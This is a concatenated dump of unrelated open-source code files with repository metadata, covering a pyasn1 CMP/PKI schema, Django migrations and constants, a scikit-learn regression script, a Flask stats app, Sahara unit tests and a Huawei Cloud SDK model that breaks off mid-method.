explicitTag=tag.Tag(tag.tagClassContext,tag.tagFormatConstructed,5)
)
),
namedtype.NamedType('popdecr', POPODecKeyRespContent().subtype(
explicitTag=tag.Tag(tag.tagClassContext,tag.tagFormatConstructed,6)
)
),
namedtype.NamedType('kur', rfc2511.CertReqMessages().subtype(
explicitTag=tag.Tag(tag.tagClassContext,tag.tagFormatConstructed,7)
)
),
namedtype.NamedType('kup', CertRepMessage().subtype(
explicitTag=tag.Tag(tag.tagClassContext,tag.tagFormatConstructed,8)
)
),
namedtype.NamedType('krr', rfc2511.CertReqMessages().subtype(
explicitTag=tag.Tag(tag.tagClassContext,tag.tagFormatConstructed,9)
)
),
namedtype.NamedType('krp', KeyRecRepContent().subtype(
explicitTag=tag.Tag(tag.tagClassContext,tag.tagFormatConstructed,10)
)
),
namedtype.NamedType('rr', RevReqContent().subtype(
explicitTag=tag.Tag(tag.tagClassContext,tag.tagFormatConstructed,11)
)
),
namedtype.NamedType('rp', RevRepContent().subtype(
explicitTag=tag.Tag(tag.tagClassContext,tag.tagFormatConstructed,12)
)
),
namedtype.NamedType('ccr', rfc2511.CertReqMessages().subtype(
explicitTag=tag.Tag(tag.tagClassContext,tag.tagFormatConstructed,13)
)
),
namedtype.NamedType('ccp', CertRepMessage().subtype(
explicitTag=tag.Tag(tag.tagClassContext,tag.tagFormatConstructed,14)
)
),
namedtype.NamedType('ckuann', CAKeyUpdAnnContent().subtype(
explicitTag=tag.Tag(tag.tagClassContext,tag.tagFormatConstructed,15)
)
),
namedtype.NamedType('cann', CertAnnContent().subtype(
explicitTag=tag.Tag(tag.tagClassContext,tag.tagFormatConstructed,16)
)
),
namedtype.NamedType('rann', RevAnnContent().subtype(
explicitTag=tag.Tag(tag.tagClassContext,tag.tagFormatConstructed,17)
)
),
namedtype.NamedType('crlann', CRLAnnContent().subtype(
explicitTag=tag.Tag(tag.tagClassContext,tag.tagFormatConstructed,18)
)
),
namedtype.NamedType('pkiconf', PKIConfirmContent().subtype(
explicitTag=tag.Tag(tag.tagClassContext,tag.tagFormatConstructed,19)
)
),
namedtype.NamedType('nested', nestedMessageContent),
# namedtype.NamedType('nested', NestedMessageContent().subtype(
# explicitTag=tag.Tag(tag.tagClassContext,tag.tagFormatConstructed,20)
# )
# ),
namedtype.NamedType('genm', GenMsgContent().subtype(
explicitTag=tag.Tag(tag.tagClassContext,tag.tagFormatConstructed,21)
)
)
)
class PKIHeader(univ.Sequence):
"""
PKIHeader ::= SEQUENCE {
pvno INTEGER { cmp1999(1), cmp2000(2) },
sender GeneralName,
recipient GeneralName,
messageTime [0] GeneralizedTime OPTIONAL,
protectionAlg [1] AlgorithmIdentifier OPTIONAL,
senderKID [2] KeyIdentifier OPTIONAL,
recipKID [3] KeyIdentifier OPTIONAL,
transactionID [4] OCTET STRING OPTIONAL,
senderNonce [5] OCTET STRING OPTIONAL,
recipNonce [6] OCTET STRING OPTIONAL,
freeText [7] PKIFreeText OPTIONAL,
generalInfo [8] SEQUENCE SIZE (1..MAX) OF
InfoTypeAndValue OPTIONAL
}
"""
componentType = namedtype.NamedTypes(
namedtype.NamedType('pvno', univ.Integer(
namedValues=namedval.NamedValues(
('cmp1999', 1),
('cmp2000', 2)
)
)
),
namedtype.NamedType('sender', rfc2459.GeneralName()),
namedtype.NamedType('recipient', rfc2459.GeneralName()),
namedtype.OptionalNamedType('messageTime', useful.GeneralizedTime().subtype(explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 0))),
namedtype.OptionalNamedType('protectionAlg', rfc2459.AlgorithmIdentifier().subtype(
explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 1))),
namedtype.OptionalNamedType('senderKID', rfc2459.KeyIdentifier().subtype(explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 2))),
namedtype.OptionalNamedType('recipKID', rfc2459.KeyIdentifier().subtype(explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 3))),
namedtype.OptionalNamedType('transactionID', univ.OctetString().subtype(explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 4))),
namedtype.OptionalNamedType('senderNonce', univ.OctetString().subtype(explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 5))),
namedtype.OptionalNamedType('recipNonce', univ.OctetString().subtype(explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 6))),
namedtype.OptionalNamedType('freeText', PKIFreeText().subtype(explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 7))),
namedtype.OptionalNamedType('generalInfo',
univ.SequenceOf(
componentType=InfoTypeAndValue().subtype(
subtypeSpec=constraint.ValueSizeConstraint(1, MAX),
explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 8)
)
)
)
)
class ProtectedPart(univ.Sequence):
"""
ProtectedPart ::= SEQUENCE {
header PKIHeader,
body PKIBody
}
"""
componentType = namedtype.NamedTypes(
namedtype.NamedType('header', PKIHeader()),
namedtype.NamedType('infoValue', PKIBody())
)
class PKIMessage(univ.Sequence):
"""
PKIMessage ::= SEQUENCE {
header PKIHeader,
body PKIBody,
protection [0] PKIProtection OPTIONAL,
extraCerts [1] SEQUENCE SIZE (1..MAX) OF CMPCertificate
OPTIONAL
}"""
componentType = namedtype.NamedTypes(
namedtype.NamedType('header', PKIHeader()),
namedtype.NamedType('body', PKIBody()),
namedtype.OptionalNamedType('protection', PKIProtection().subtype(explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatSimple, 0))),
namedtype.OptionalNamedType( 'extraCerts',
univ.SequenceOf(
componentType=CMPCertificate()
).subtype(
subtypeSpec=constraint.ValueSizeConstraint(1, MAX),
explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 1)
)
)
)
class PKIMessages(univ.SequenceOf):
"""
PKIMessages ::= SEQUENCE SIZE (1..MAX) OF PKIMessage
"""
componentType = PKIMessage()
subtypeSpec = univ.SequenceOf.subtypeSpec + constraint.ValueSizeConstraint(1, MAX)
# pyasn1 does not naturally handle recursive definitions, thus this hack:
# NestedMessageContent ::= PKIMessages
NestedMessageContent.componentType = PKIMessages()
nestedMessageContent.componentType = PKIMessages()
| 37.655172
| 151
| 0.603709
|
5542fa8291e04589457af28826be55906b3e9675
| 509
|
py
|
Python
|
datastructures/arrays/find_continuous_subsegment_counts.py
|
hariharanragothaman/pymaster
|
b3d033b4d5c75c69f587c94d9d12cd4a349a6a69
|
[
"Apache-2.0"
] | 10
|
2020-09-21T22:23:09.000Z
|
2022-01-25T16:58:44.000Z
|
datastructures/arrays/find_continuous_subsegment_counts.py
|
hariharanragothaman/pymaster
|
b3d033b4d5c75c69f587c94d9d12cd4a349a6a69
|
[
"Apache-2.0"
] | null | null | null |
datastructures/arrays/find_continuous_subsegment_counts.py
|
hariharanragothaman/pymaster
|
b3d033b4d5c75c69f587c94d9d12cd4a349a6a69
|
[
"Apache-2.0"
] | null | null | null |
def find_continuous_subsegment(arr):
"""
This helps in splitting the array and finding continuous subsegments smartly
"""
temp = []
n = len(arr)
cnt, prev = 1, arr[0]
for i in range(n - 1):
if arr[i + 1] == prev:
cnt += 1
else:
temp.append(cnt)
cnt = 1
prev = arr[i + 1]
temp.append(cnt)
print("The tmp is:", temp)
if __name__ == "__main__":
arr = [2, 2, 2, 1, 1, 2, 2]
find_continuous_subsegment(arr)
| 22.130435
| 80
| 0.522593
|
3de7b1b88e8bc5fdea27e7fbd09eecf9833a8055
| 369
|
py
|
Python
|
eventpage/migrations/0027_rename_html_announcement_markdown.py
|
lukas2511/voctoconf
|
7c9d05e0bddadfb6e589bf73e2adeb9d83594038
|
[
"MIT"
] | 21
|
2020-08-24T13:27:03.000Z
|
2021-10-15T09:17:46.000Z
|
eventpage/migrations/0027_rename_html_announcement_markdown.py
|
lukas2511/voctoconf
|
7c9d05e0bddadfb6e589bf73e2adeb9d83594038
|
[
"MIT"
] | null | null | null |
eventpage/migrations/0027_rename_html_announcement_markdown.py
|
lukas2511/voctoconf
|
7c9d05e0bddadfb6e589bf73e2adeb9d83594038
|
[
"MIT"
] | 5
|
2020-08-25T16:34:51.000Z
|
2021-02-19T04:48:10.000Z
|
# Generated by Django 3.2 on 2021-04-24 09:13
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('eventpage', '0026_auto_20200823_0133'),
]
operations = [
migrations.RenameField(
model_name='announcement',
old_name='html',
new_name='markdown',
),
]
| 19.421053
| 49
| 0.593496
|
a40f1135708bbac18df1c9ee386d3a19d00d70dc
| 1,648
|
py
|
Python
|
laws/vote_choices.py
|
navotsil/Open-Knesset
|
d6cc6457f87e67a3dbeaec9c1ccbc8d8b7c60c04
|
[
"BSD-3-Clause"
] | 7
|
2015-03-05T11:14:23.000Z
|
2017-02-11T18:06:25.000Z
|
laws/vote_choices.py
|
navotsil/Open-Knesset
|
d6cc6457f87e67a3dbeaec9c1ccbc8d8b7c60c04
|
[
"BSD-3-Clause"
] | 7
|
2020-02-12T01:09:15.000Z
|
2022-03-11T23:25:12.000Z
|
laws/vote_choices.py
|
navotsil/Open-Knesset
|
d6cc6457f87e67a3dbeaec9c1ccbc8d8b7c60c04
|
[
"BSD-3-Clause"
] | 11
|
2015-02-21T09:45:06.000Z
|
2021-05-05T06:01:24.000Z
|
from django.utils.translation import ugettext_lazy as _
from django.db.models import Q
TYPE_CHOICES = (
('all', _('All votes')),
('law-approve', _('Law Approvals')),
('second-call', _('Second Call')),
('demurrer', _('Demurrer')),
('no-confidence', _('Motion of no confidence')),
('pass-to-committee', _('Pass to committee')),
('continuation', _('Continuation')),
)
SIMPLE_TYPE_CHOICES = (
('', '---'),
('pre vote', _('Pre Vote')),
('first vote', _('First Vote')),
('approve vote', _('Approval Vote')),
)
TAGGED_CHOICES = (
('all', _('All')),
('false', _('Untagged Votes')),
)
ORDER_CHOICES = (
('time', _('Time')),
('controversy', _('Controversy')),
('against-party', _('Against Party')),
('votes', _('Number of votes')),
)
BILL_STAGE_CHOICES = (
(u'?', _(u'Unknown')),
(u'0', _(u'Frozen in previous knesset')),
(u'1', _(u'Proposed')),
(u'2', _(u'Pre-Approved')),
(u'-2',_(u'Failed Pre-Approval')),
(u'-2.1', _(u'Converted to discussion')),
(u'3', _(u'In Committee')),
(u'4', _(u'First Vote')),
(u'-4',_(u'Failed First Vote')),
(u'5', _(u'Committee Corrections')),
(u'6', _(u'Approved')),
(u'-6',_(u'Failed Approval')),
)
BILL_AGRR_STAGES = { 'proposed':Q(stage__isnull=False),
'pre':Q(stage='2')|Q(stage='3')|Q(stage='4')|Q(stage='5')|Q(stage='6'),
'first':Q(stage='4')|Q(stage='5')|Q(stage='6'),
'approved':Q(stage='6'),
}
BILL_TAGGED_CHOICES = (
('all', _('All')),
('false', _('Untagged Proposals')),
)
| 27.932203
| 87
| 0.518204
|
6359821acb4b9462651368e5fc495b0b7a073109
| 7,898
|
py
|
Python
|
src/Regression/phys_training.py
|
mattcwilde/astrokriging
|
05476a3fd69a66ffa28b16bad5a260a8272c6712
|
[
"BSD-3-Clause"
] | null | null | null |
src/Regression/phys_training.py
|
mattcwilde/astrokriging
|
05476a3fd69a66ffa28b16bad5a260a8272c6712
|
[
"BSD-3-Clause"
] | null | null | null |
src/Regression/phys_training.py
|
mattcwilde/astrokriging
|
05476a3fd69a66ffa28b16bad5a260a8272c6712
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Fri Sep 30 11:41:38 2016
@author: dflemin3
This script performs model comparison to see which estimator performs the best on VPLANET
simulation results. The script then performs a bootstrapping procedure on each fitted
module to see where it performs poorly and hence where additional simulations need to
be ran.
For this script, I test linear regression, ridge regression and an ensemble
method, Random Forest regression. Error estimates computed using bootstrapping
will only work for linear and ridge regression and boostrapping is used to
build the random forest regressor.
\begin{tabular}{llrrrrr}
\toprule
{} & est & training MSE & testing MSE & training R\textasciicircum2 & testing R\textasciicircum2 & Median Std \\
\midrule
0 & OLS & 0.099971 & 0.102640 & 0.582150 & 0.569601 & 0.015973 \\
1 & RR & 0.099974 & 0.102606 & 0.582140 & 0.569746 & 0.015426 \\
2 & RF & 0.014023 & 0.033080 & 0.941388 & 0.861286 & 0.000000 \\
\bottomrule
\end{tabular}
"""
# Imports
from __future__ import print_function, division, unicode_literals
import os
import matplotlib as mpl
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import pickle
import bootstrap_utils as bu
from sklearn.model_selection import GridSearchCV, ShuffleSplit, train_test_split
from sklearn.metrics import mean_squared_error
from sklearn.ensemble import RandomForestRegressor
from sklearn.linear_model import LinearRegression, Ridge
from sklearn import preprocessing
#Typical plot parameters that make for pretty plots
mpl.rcParams['figure.figsize'] = (9,8)
mpl.rcParams['font.size'] = 20.0
mpl.rc('font',**{'family':'serif','serif':['Computer Modern']})
mpl.rc('text', usetex=True)
# Flags to control functionality
show_plots = False
save_models = True
# Constants
seed = 42 # RNG seed
test_frac = 0.2
val_frac = 0.2 # Fraction of training data to use as validation for training hyperparams
n_alpha = 50 # Size of alpha grid search for ridge
k = 5 # number of folds for cross validation
# Locations of caches, data
data_loc = "../Data"
phys_cache = "proc_physical_3sig.pkl"
phys_poly_cache = "proc_physical_poly_3sig.pkl"
phys_model_cache = "proc_physical_model.pkl"
cache_loc = "/astro/store/gradscratch/tmp/dflemin3/ML_Data"
plot_loc = "../Plots"
################################################################
#
# Load dataframe from cache, exploratory data analysis
#
################################################################
# Load physical data
if os.path.exists(os.path.join(data_loc,phys_cache)):
print("Reading data from cache:",phys_cache)
with open(os.path.join(data_loc,phys_cache), 'rb') as handle:
X, y, names = pickle.load(handle)
else:
raise NameError("%s not defined." % phys_cache)
################################################################
#
# Train, test, compare!
#
################################################################
# Split into training, testing set
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = test_frac,
random_state=seed)
# Scale data to 0 mean, 1 std based on training data
scaler = preprocessing.StandardScaler().fit(X_train)
X_train = scaler.transform(X_train)
X_test = scaler.transform(X_test)
# Make list of model defaults
models = [LinearRegression(),
Ridge(random_state=seed),
RandomForestRegressor(random_state=seed)
]
# Do we need to train model's hyperparameters?
train_hyper = [False, True, True]
# For cross validation, do k splits with validation on val_frac of training data held out
cv = ShuffleSplit(n_splits=k, test_size=val_frac, random_state=seed)
# List of dicts of params for grid search cross validation
hyper_ranges = [{},
{"alpha":np.logspace(-10,1,n_alpha)},
{"max_depth":[2,4,6,8,10,None]}
]
# Containers for error/loss metrics
train_r2 = []
train_mse = []
test_r2 = []
test_mse = []
# Loop over models!
for ii in range(len(models)):
# If you need to train hyper parameters
if train_hyper[ii]:
print("Training hyperparameters and fitting:",models[ii])
# Run grid search on subset of training data, overwrite model with best fit
# using k fold cross validation
grid = GridSearchCV(models[ii], param_grid=hyper_ranges[ii], cv=cv)
# Now refit over entire training set with best hyperparameters
models[ii] = grid.fit(X_train, y_train).best_estimator_
print(models[ii])
# Save training R^2, MSE for train, test set
# Train
y_hat_train = models[ii].predict(X_train)
train_mse.append(mean_squared_error(y_train, y_hat_train))
train_r2.append(models[ii].score(X_train, y_train))
# Test
y_hat_test = models[ii].predict(X_test)
test_mse.append(mean_squared_error(y_test, y_hat_test))
test_r2.append(models[ii].score(X_test, y_test))
# No hyperparameters, just fit on training data!
else:
print("Fitting:",models[ii])
models[ii].fit(X_train, y_train)
# Save training R^2, MSE for train, test set
# Train
y_hat_train = models[ii].predict(X_train)
train_mse.append(mean_squared_error(y_train, y_hat_train))
train_r2.append(models[ii].score(X_train, y_train))
# Test
y_hat_test = models[ii].predict(X_test)
test_mse.append(mean_squared_error(y_test, y_hat_test))
test_r2.append(models[ii].score(X_test, y_test))
print("Training, testing r^2:")
print(train_r2,test_r2)
print("Training, testing MSE:")
print(train_mse,test_mse)
# Save models?
if save_models and not os.path.exists(os.path.join(cache_loc,phys_model_cache)):
# Pickle the data to use with bootstrapping
print("Caching data at %s" % os.path.join(cache_loc,phys_model_cache))
with open(os.path.join(cache_loc,phys_model_cache), 'wb') as handle:
pickle.dump(models, handle)
################################################################
#
# Perform bootstrapping using best models for non-ensemble
# estimators.
#
################################################################
# Specify bootstrapping parameters
nboots = 100
# Extract fitted linear models
lr = models[0]
rr = models[1]
# Bootstrap!
print("Bootstrapping...")
ols_mean, ols_std = bu.bootstrap_error_estimate_test(lr, X_train, y_train, X_test, nboots=nboots, seed=seed)
rr_mean, rr_std = bu.bootstrap_error_estimate_test(rr, X_train, y_train, X_test, nboots=nboots, seed=seed)
# Save to latex style table
data = [['OLS',train_mse[0], test_mse[0], train_r2[0], test_r2[0], np.median(ols_std)],
['RR',train_mse[1], test_mse[1], train_r2[1], test_r2[1], np.median(rr_std)],
['RF',train_mse[2], test_mse[2], train_r2[2], test_r2[2], 0.0]]
col_names = ['est','training MSE','testing MSE', r'training R^2', r'testing R^2', r"Median Std"]
table = pd.DataFrame(data=data, columns=col_names)
print(table.to_latex())
################################################################
#
# Visualize bootstrapping results
#
################################################################
if show_plots:
# See how ridge regression bootstrapping performs
fig, ax = plt.subplots()
xind = names["b_Inc"]
yind = names["c_Inc"]
cax = ax.scatter(X[:,xind],X[:,yind], c=rr_std, edgecolor="none", cmap="viridis")
cbar = fig.colorbar(cax)
cbar.set_label("Standard Deviation",rotation=270,labelpad=20)
# Format
ax.set_xlim(X[:,xind].min(),X[:,xind].max())
ax.set_ylim(X[:,yind].min(),X[:,yind].max())
ax.set_xlabel("b Inclination [degrees]")
ax.set_ylabel("c Inclination [degrees]")
#fig.tight_layout()
#fig.savefig(os.path.join(plot_loc,"rr_inc_inc.pdf"))
plt.show()
| 32.908333
| 118
| 0.651051
|
31fd6f5429493d2c5793e577a2d076b76c9e52e7
| 540
|
py
|
Python
|
python/restartNetflix7.py
|
SheffieldML/collab
|
463d1cdb5bd0a6b8d39e0046afcacb17653cded8
|
[
"BSD-3-Clause"
] | 27
|
2015-05-12T13:28:22.000Z
|
2021-05-09T18:55:07.000Z
|
python/restartNetflix7.py
|
afcarl/collab
|
463d1cdb5bd0a6b8d39e0046afcacb17653cded8
|
[
"BSD-3-Clause"
] | 1
|
2015-04-11T18:40:31.000Z
|
2015-06-02T20:04:40.000Z
|
python/restartNetflix7.py
|
afcarl/collab
|
463d1cdb5bd0a6b8d39e0046afcacb17653cded8
|
[
"BSD-3-Clause"
] | 11
|
2015-04-11T18:38:28.000Z
|
2020-03-17T02:42:06.000Z
|
#!/usr/bin/env python
# Try collaborative filtering on the netflix data.
import collab
import ndlml as nl
opt = collab.options()
opt.resultsBaseDir = "/local/data/results/netflix/"
try:
collab.restart(loadIter = 5,
startCount = 2620000,
loadUser = 2190625,
latentDim = 7,
dataSetName = 'netflix',
experimentNo = 7,
options=opt)
except:
import pdb, sys
e, m, tb = sys.exc_info()
pdb.post_mortem(tb)
| 23.478261
| 51
| 0.548148
|
7a3764d3ad9643ce717b6614f0ab585bdeee587b
| 3,620
|
py
|
Python
|
web/datatrace_web/index.py
|
pensnarik/domains-database
|
b42d8b6e4e249eba50e3e441fdae98aeedcbeb03
|
[
"MIT"
] | 1
|
2020-03-24T23:57:59.000Z
|
2020-03-24T23:57:59.000Z
|
web/datatrace_web/index.py
|
pensnarik/domains-database
|
b42d8b6e4e249eba50e3e441fdae98aeedcbeb03
|
[
"MIT"
] | 3
|
2020-01-30T13:40:37.000Z
|
2020-01-31T11:08:52.000Z
|
web/datatrace_web/index.py
|
pensnarik/domains-database
|
b42d8b6e4e249eba50e3e441fdae98aeedcbeb03
|
[
"MIT"
] | null | null | null |
import json
import datetime as dt
from flask import render_template, g, request
from datatrace_web import app, sql
import calendar, json, pytz
def get_hosts():
query = '''
select distinct hostname
from session
where end_time is null
and instance is not null
order by 1
'''
return [i['hostname'] for i in sql.get_rows(query)]
@app.route('/', methods=['GET'])
def index():
tz = pytz.timezone('CET')
default_intervals = {
'h': [dt.date.today().strftime('%Y-%m-%d 00:00'),
(dt.date.today() + dt.timedelta(days=1)).strftime('%Y-%m-%d 00:00')],
'm': [(dt.datetime.now().astimezone(tz) - dt.timedelta(hours=1)).strftime('%Y-%m-%d %H:%M'),
dt.datetime.now().astimezone(tz).strftime('%Y-%m-%d %H:%M')]
}
host = request.args.get('host')
interval = request.args.get('interval', 'm')
date_from = request.args.get('date_from')
date_till = request.args.get('date_till')
if date_from is None or date_till is None:
date_from, date_till = default_intervals[interval]
if host == '':
host = None
stat = sql.get_rows("select * from report.stat(%s, %s, %s, %s)", (date_from, date_till, host, interval,))
hosts_stat = sql.get_rows("select * from report.hosts_stat(%s, %s, %s)", (date_from, date_till, interval, ))
status_stat = sql.get_rows("select * from report.status_log(%s, %s, %s, %s)", (date_from, date_till, host, interval, ))
hosts_data = dict()
hosts_data_avg = dict()
status_data = {'ok': list(), 'timeout': list(), 'connection_error': list(),
'too_many_redirects': list(), 'unknown_error': list(),
'too_large': list(), 'resolve_error': list()}
for row in hosts_stat:
if row['host'] in hosts_data.keys():
hosts_data[row['host']].append({'Timestamp': row['date_time'].strftime('%Y-%m-%dT%H:%M%Z'), 'Value': row['parsed_sites']})
hosts_data_avg[row['host']].append({'Timestamp': row['date_time'].strftime('%Y-%m-%d %H:%M%Z'), 'Value': str(row['avg_total'])})
else:
hosts_data[row['host']] = [{'Timestamp': row['date_time'].strftime('%Y-%m-%d %H:%M%Z'), 'Value': row['parsed_sites']}]
hosts_data_avg[row['host']] = [{'Timestamp': row['date_time'].strftime('%Y-%m-%d %H:%M%Z'), 'Value': str(row['avg_total'])}]
for row in status_stat:
for status in status_data.keys():
status_data[status].append({'Timestamp': row['date_time'].strftime('%Y-%m-%d %H:%M%Z'), 'Value': row['num_%s' % status]})
return render_template('index.html', stat=stat, host=host, interval=interval, hosts=get_hosts(),
date_from=date_from, date_till=date_till, hosts_data=json.dumps(hosts_data),
hosts_data_avg=hosts_data_avg, status_data=json.dumps(status_data))
@app.route('/search', methods=['GET'])
def search():
domain = request.args.get('domain')
ip = request.args.get('ip')
phone = request.args.get('phone')
last_domain = request.args.get('last_domain')
if domain == '':
domain = None
if ip == '':
ip = None
if last_domain == '':
last_domain = None
if phone == '':
phone = None
query = '''
select * from public.search(%s, %s, %s, %s)
'''
result = sql.get_rows(query, (domain, ip, phone, last_domain,))
last_domain = result[-1]['domain'] if len(result) > 0 else None
return render_template('search.html', result=result, domain=domain, ip=ip, phone=phone,
last_domain=last_domain)
| 39.347826
| 140
| 0.595856
|
6ba1b986ec48c5c8dc6e716ac78122c1b97d5173
| 6,644
|
py
|
Python
|
sahara/tests/unit/service/test_periodic.py
|
redhat-openstack/sahara
|
67165c96eceb1ce3b087870934d394602f5dd959
|
[
"Apache-2.0"
] | null | null | null |
sahara/tests/unit/service/test_periodic.py
|
redhat-openstack/sahara
|
67165c96eceb1ce3b087870934d394602f5dd959
|
[
"Apache-2.0"
] | null | null | null |
sahara/tests/unit/service/test_periodic.py
|
redhat-openstack/sahara
|
67165c96eceb1ce3b087870934d394602f5dd959
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) 2013 Mirantis Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import datetime
import mock
from oslo_utils import timeutils
from sahara.conductor import manager
from sahara import context
import sahara.service.periodic as p
import sahara.tests.unit.base as base
from sahara.tests.unit.conductor.manager import test_clusters as tc
from sahara.tests.unit.conductor.manager import test_edp as te
class TestPeriodicBack(base.SaharaWithDbTestCase):
def setUp(self):
super(TestPeriodicBack, self).setUp()
self.api = manager.ConductorManager()
@mock.patch('sahara.service.edp.job_manager.get_job_status')
def test_job_status_update(self, get_job_status):
ctx = context.ctx()
job = self.api.job_create(ctx, te.SAMPLE_JOB)
ds = self.api.data_source_create(ctx, te.SAMPLE_DATA_SOURCE)
self._create_job_execution({"end_time": datetime.datetime.now(),
"id": 1},
job, ds, ds)
self._create_job_execution({"end_time": None,
"id": 2},
job, ds, ds)
self._create_job_execution({"end_time": None,
"id": 3},
job, ds, ds)
p._make_periodic_tasks().update_job_statuses(None)
self.assertEqual(2, get_job_status.call_count)
get_job_status.assert_has_calls([mock.call(u'2'),
mock.call(u'3')])
@mock.patch('sahara.service.ops.terminate_cluster')
def test_transient_cluster_terminate(self, terminate_cluster):
timeutils.set_time_override(datetime.datetime(2005, 2, 1, 0, 0))
ctx = context.ctx()
job = self.api.job_create(ctx, te.SAMPLE_JOB)
ds = self.api.data_source_create(ctx, te.SAMPLE_DATA_SOURCE)
self._make_cluster('1')
self._make_cluster('2')
self._create_job_execution({"end_time": timeutils.utcnow(),
"id": 1,
"cluster_id": "1"},
job, ds, ds)
self._create_job_execution({"end_time": None,
"id": 2,
"cluster_id": "2"},
job, ds, ds)
self._create_job_execution({"end_time": None,
"id": 3,
"cluster_id": "2"},
job, ds, ds)
timeutils.set_time_override(datetime.datetime(2005, 2, 1, 0, 1))
p._make_periodic_tasks().terminate_unneeded_transient_clusters(None)
self.assertEqual(1, terminate_cluster.call_count)
terminate_cluster.assert_has_calls([mock.call(u'1')])
@mock.patch('sahara.service.ops.terminate_cluster')
def test_transient_cluster_not_killed_too_early(self, terminate_cluster):
timeutils.set_time_override(datetime.datetime(2005, 2, 1, second=0))
self._make_cluster('1')
timeutils.set_time_override(datetime.datetime(2005, 2, 1, second=20))
p._make_periodic_tasks().terminate_unneeded_transient_clusters(None)
self.assertEqual(0, terminate_cluster.call_count)
@mock.patch('sahara.service.ops.terminate_cluster')
def test_transient_cluster_killed_in_time(self, terminate_cluster):
timeutils.set_time_override(datetime.datetime(2005, 2, 1, second=0))
self._make_cluster('1')
timeutils.set_time_override(datetime.datetime(2005, 2, 1, second=40))
p._make_periodic_tasks().terminate_unneeded_transient_clusters(None)
self.assertEqual(1, terminate_cluster.call_count)
terminate_cluster.assert_has_calls([mock.call(u'1')])
@mock.patch('sahara.service.ops.terminate_cluster')
def test_incomplete_cluster_not_killed_too_early(self, terminate_cluster):
self.override_config('cleanup_time_for_incomplete_clusters', 1)
timeutils.set_time_override(datetime.datetime(2005, 2, 1, second=0))
self._make_cluster('1', status='Pending')
timeutils.set_time_override(datetime.datetime(
2005, 2, 1, minute=59, second=50))
p._make_periodic_tasks().terminate_incomplete_clusters(None)
self.assertEqual(0, terminate_cluster.call_count)
@mock.patch('sahara.service.ops.terminate_cluster')
def test_incomplete_cluster_killed_in_time(self, terminate_cluster):
self.override_config('cleanup_time_for_incomplete_clusters', 1)
timeutils.set_time_override(datetime.datetime(2005, 2, 1, second=0))
self._make_cluster('1', status='Pending')
timeutils.set_time_override(datetime.datetime(
2005, 2, 1, hour=1, second=10))
p._make_periodic_tasks().terminate_incomplete_clusters(None)
self.assertEqual(1, terminate_cluster.call_count)
terminate_cluster.assert_has_calls([mock.call(u'1')])
@mock.patch('sahara.service.ops.terminate_cluster')
def test_active_cluster_not_killed_as_inactive(
self, terminate_cluster):
self.override_config('cleanup_time_for_incomplete_clusters', 1)
timeutils.set_time_override(datetime.datetime(2005, 2, 1, second=0))
self._make_cluster('1')
timeutils.set_time_override(datetime.datetime(
2005, 2, 1, hour=1, second=10))
p._make_periodic_tasks().terminate_incomplete_clusters(None)
self.assertEqual(0, terminate_cluster.call_count)
def _make_cluster(self, id_name, status='Active'):
ctx = context.ctx()
c = tc.SAMPLE_CLUSTER.copy()
c["status"] = status
c["id"] = id_name
c["name"] = id_name
c['updated_at'] = timeutils.utcnow()
self.api.cluster_create(ctx, c)
def _create_job_execution(self, values, job, input, output):
values.update({"job_id": job['id'],
"input_id": input['id'],
"output_id": output['id']})
self.api.job_execution_create(context.ctx(), values)
| 39.082353
| 78
| 0.642234
|
7fe8fc96dc1f05826dd15e47e87b19bc8e6af630
| 2,865
|
py
|
Python
|
huaweicloud-sdk-as/huaweicloudsdkas/v1/model/show_api_version_response.py
|
wuchen-huawei/huaweicloud-sdk-python-v3
|
3683d703f4320edb2b8516f36f16d485cff08fc2
|
[
"Apache-2.0"
] | 1
|
2021-11-03T07:54:50.000Z
|
2021-11-03T07:54:50.000Z
|
huaweicloud-sdk-as/huaweicloudsdkas/v1/model/show_api_version_response.py
|
wuchen-huawei/huaweicloud-sdk-python-v3
|
3683d703f4320edb2b8516f36f16d485cff08fc2
|
[
"Apache-2.0"
] | null | null | null |
huaweicloud-sdk-as/huaweicloudsdkas/v1/model/show_api_version_response.py
|
wuchen-huawei/huaweicloud-sdk-python-v3
|
3683d703f4320edb2b8516f36f16d485cff08fc2
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
import pprint
import re
import six
from huaweicloudsdkcore.sdk_response import SdkResponse
class ShowApiVersionResponse(SdkResponse):
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'version': 'VersionInfo'
}
attribute_map = {
'version': 'version'
}
def __init__(self, version=None):
"""ShowApiVersionResponse - a model defined in huaweicloud sdk"""
super(ShowApiVersionResponse, self).__init__()
self._version = None
self.discriminator = None
if version is not None:
self.version = version
@property
def version(self):
"""Gets the version of this ShowApiVersionResponse.
:return: The version of this ShowApiVersionResponse.
:rtype: VersionInfo
"""
return self._version
@version.setter
def version(self, version):
"""Sets the version of this ShowApiVersionResponse.
:param version: The version of this ShowApiVersionResponse.
:type: VersionInfo
"""
self._version = version
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
